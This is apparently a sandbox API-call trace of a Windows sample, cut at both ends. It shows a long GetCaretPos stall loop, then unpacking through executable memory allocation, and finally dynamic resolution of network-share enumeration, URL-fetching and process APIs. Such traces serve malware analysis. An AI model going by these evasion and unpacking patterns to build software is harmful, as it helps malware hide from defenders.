lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.559] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.560] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.561] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.562] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.563] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0126.649] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75d20000 [0126.650] GetProcAddress (hModule=0x75d20000, lpProcName="LocalAlloc") returned 0x75d3168c [0126.650] LocalAlloc (uFlags=0x0, uBytes=0x90f18) returned 0x350020 [0126.661] GetProcAddress (hModule=0x75d20000, lpProcName="VirtualProtect") returned 0x75d3435f [0126.662] VirtualProtect (in: lpAddress=0x350020, dwSize=0x90f18, flNewProtect=0x40, lpflOldProtect=0x18fd4c | out: lpflOldProtect=0x18fd4c*=0x4) returned 1 [0126.922] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75d20000 [0126.922] GetProcAddress (hModule=0x75d20000, lpProcName="GlobalAlloc") returned 0x75d3588e [0126.922] GetProcAddress (hModule=0x75d20000, lpProcName="GetLastError") returned 0x75d311c0 [0126.922] GetProcAddress (hModule=0x75d20000, lpProcName="Sleep") returned 0x75d310ff [0126.922] GetProcAddress (hModule=0x75d20000, lpProcName="VirtualAlloc") returned 0x75d31856 [0126.922] GetProcAddress (hModule=0x75d20000, lpProcName="CreateToolhelp32Snapshot") returned 0x75d5735f [0126.922] GetProcAddress (hModule=0x75d20000, lpProcName="Module32First") returned 0x75db5cd9 [0126.922] GetProcAddress (hModule=0x75d20000, lpProcName="CloseHandle") returned 0x75d31410 [0126.922] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0126.924] Module32First (hSnapshot=0x58, lpme=0x18ede0) returned 1 [0126.926] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x5b0000 [0127.351] GetProcAddress (hModule=0x75d20000, lpProcName="LoadLibraryA") returned 0x75d349d7 [0127.351] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75d20000 [0127.351] GetProcAddress (hModule=0x75d20000, lpProcName="VirtualAlloc") returned 0x75d31856 [0127.352] GetProcAddress (hModule=0x75d20000, lpProcName="VirtualProtect") returned 0x75d3435f [0127.352] GetProcAddress (hModule=0x75d20000, lpProcName="VirtualFree") returned 0x75d3186e [0127.352] GetProcAddress (hModule=0x75d20000, lpProcName="GetVersionExA") returned 0x75d33519 [0127.352] GetProcAddress (hModule=0x75d20000, lpProcName="TerminateProcess") returned 0x75d4d802 [0127.352] GetProcAddress (hModule=0x75d20000, lpProcName="ExitProcess") returned 0x75d37a10 [0127.352] GetProcAddress (hModule=0x75d20000, lpProcName="SetErrorMode") returned 0x75d31b00 [0127.352] SetErrorMode (uMode=0x400) returned 0x0 [0127.352] SetErrorMode (uMode=0x0) returned 0x400 [0127.352] GetVersionExA (in: lpVersionInformation=0x18dd10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Ùw") | out: lpVersionInformation=0x18dd10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0127.352] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f00000 [0127.381] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ed98 | out: lpflOldProtect=0x18ed98*=0x2) returned 1 [0128.524] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x77250000 [0128.524] GetProcAddress (hModule=0x77250000, lpProcName="RpcStringFreeW") returned 0x77271635 [0128.524] GetProcAddress (hModule=0x77250000, lpProcName="UuidCreate") returned 0x7726f48b [0128.524] GetProcAddress (hModule=0x77250000, lpProcName="UuidToStringW") returned 0x77291ee5 [0128.524] GetProcAddress (hModule=0x77250000, lpProcName="RpcStringFreeA") returned 0x77293fc5 [0128.524] GetProcAddress (hModule=0x77250000, lpProcName="UuidToStringA") returned 0x772cd918 [0128.524] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x756c0000 [0128.986] GetProcAddress (hModule=0x756c0000, lpProcName="WNetOpenEnumW") returned 0x756c2f06 [0128.986] GetProcAddress (hModule=0x756c0000, lpProcName="WNetEnumResourceW") returned 0x756c3058 [0128.986] GetProcAddress (hModule=0x756c0000, lpProcName="WNetCloseEnum") returned 0x756c2dd6 [0128.986] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x76c00000 [0128.998] GetProcAddress (hModule=0x76c00000, lpProcName="InternetCloseHandle") returned 0x76c1ab49 [0128.998] GetProcAddress (hModule=0x76c00000, lpProcName="InternetReadFile") returned 0x76c1b406 [0128.998] GetProcAddress (hModule=0x76c00000, lpProcName="InternetOpenUrlW") returned 0x76c7be5c [0128.998] GetProcAddress (hModule=0x76c00000, lpProcName="InternetOpenW") returned 0x76c29197 [0128.998] GetProcAddress (hModule=0x76c00000, lpProcName="HttpQueryInfoW") returned 0x76c25c75 [0128.998] GetProcAddress (hModule=0x76c00000, lpProcName="InternetOpenA") returned 0x76c2f18e [0128.998] GetProcAddress (hModule=0x76c00000, lpProcName="InternetOpenUrlA") returned 0x76c430f1 [0128.998] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75680000 [0129.800] GetProcAddress (hModule=0x75680000, lpProcName="timeGetTime") returned 0x756826e0 [0129.800] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x776e0000 [0129.801] GetProcAddress (hModule=0x776e0000, lpProcName="PathAppendA") returned 0x776ed65e [0129.801] GetProcAddress (hModule=0x776e0000, lpProcName="PathFindFileNameW") returned 0x776fbb71 [0129.801] GetProcAddress (hModule=0x776e0000, lpProcName="PathRemoveFileSpecW") returned 0x776f3248 [0129.801] GetProcAddress (hModule=0x776e0000, lpProcName="PathFileExistsA") returned 0x7771ad1a [0129.801] GetProcAddress (hModule=0x776e0000, lpProcName="PathFileExistsW") returned 0x776f45bf [0129.801] GetProcAddress (hModule=0x776e0000, lpProcName="PathAppendW") returned 0x776f81ef [0129.801] GetProcAddress (hModule=0x776e0000, lpProcName="PathFindExtensionW") returned 0x776fa1b9 [0129.801] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75d20000 [0129.801] GetProcAddress (hModule=0x75d20000, lpProcName="VirtualFree") returned 0x75d3186e [0129.801] GetProcAddress (hModule=0x75d20000, lpProcName="WriteFile") returned 0x75d31282 [0129.801] GetProcAddress (hModule=0x75d20000, lpProcName="GetDriveTypeA") returned 0x75d4ef75 [0129.801] GetProcAddress (hModule=0x75d20000, lpProcName="OpenProcess") returned 0x75d31986 [0129.801] GetProcAddress (hModule=0x75d20000, lpProcName="GlobalAlloc") returned 0x75d3588e [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="GetSystemDirectoryW") returned 0x75d35063 [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="WideCharToMultiByte") returned 0x75d3170d [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="LoadLibraryW") returned 0x75d3492b [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="Sleep") returned 